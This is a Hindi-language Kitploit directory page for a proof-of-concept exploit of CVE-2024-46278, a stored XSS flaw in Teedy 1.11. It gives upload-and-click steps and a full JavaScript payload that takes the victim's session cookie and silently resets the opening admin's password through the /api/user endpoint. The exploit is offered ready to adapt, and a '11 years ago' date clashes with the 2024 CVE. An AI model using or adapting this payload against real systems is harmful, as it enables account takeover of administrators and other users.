Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46278-teedy_1.11_account-takeover — 【Teedy 1.11】खाता अधिग्रहण XSS के माध्यम से | Kitploit
उपकरण/GitHubGitHub/ayato-shitomi/cve-2024-46278-teedy_1.11_account-takeover
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंग
GitHubayato-shitomi/cve-2024-46278-teedy_1.11_account-takeover

CVE-2024-46278-teedy_1.11_account-takeover

【Teedy 1.11】खाता अधिग्रहण XSS के माध्यम से

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

【CVE-2024-46278】teedy_1.11_खाता-अधिग्रहण

【Teedy 1.11】XSS के माध्यम से खाता अधिग्रहण

विवरण

फ़ाइलें डाउनलोड करते समय XSS उत्पन्न करने वाली एक कमज़ोरी है। XSS कमज़ोरी एक Teedy व्यवस्थापक को कुछ ही क्लिक में खाता चुराने की अनुमति दे सकती है।

यह कमज़ोरी CVE-2024-46278 के रूप में चिह्नित है: https://www.cve.org/CVERecord?id=CVE-2024-46278

PoC

  • किसी हमलावर के खाते में लॉगिन करें।
  • इस फ़ाइल को html प्रकार के रूप में अपलोड करें। आपको "Origin" और "Referer" और fetch के तर्क को आवश्यकतानुसार बदलना होगा।
root@kitploit:~
<script>
const currentCookie = document.cookie;

const requestOptions = {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Accept': 'application/json, text/plain, */*',
    'Cookie': currentCookie,
    'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
    'sec-ch-ua-mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
    'sec-ch-ua-platform': '"Linux"',
    'Origin': 'http://localhost:8080',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'http://localhost:8080/',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9'
  },
  body: 'password=superSecure2&passwordconfirm=superSecure2'
};

fetch('http://localhost:8080/api/user', requestOptions)
  .then(response => {
    if (!response.ok) {
      throw new Error('Network response was not ok');
    }
        document.write('<h1>Your account was taken over by the attacker LOL</h1>');
    return response.json();
  })
  .then(data => console.log(data))
  .catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
  • दूसरे खाते से लॉगिन करें। जैसे admin
  • हमलावर द्वारा अपलोड की गई फ़ाइल पर क्लिक करें और Download this file चुनें।

डेमो

https://www.youtube.com/watch?v=udQgVogsmhA

टूल डाउनलोड करें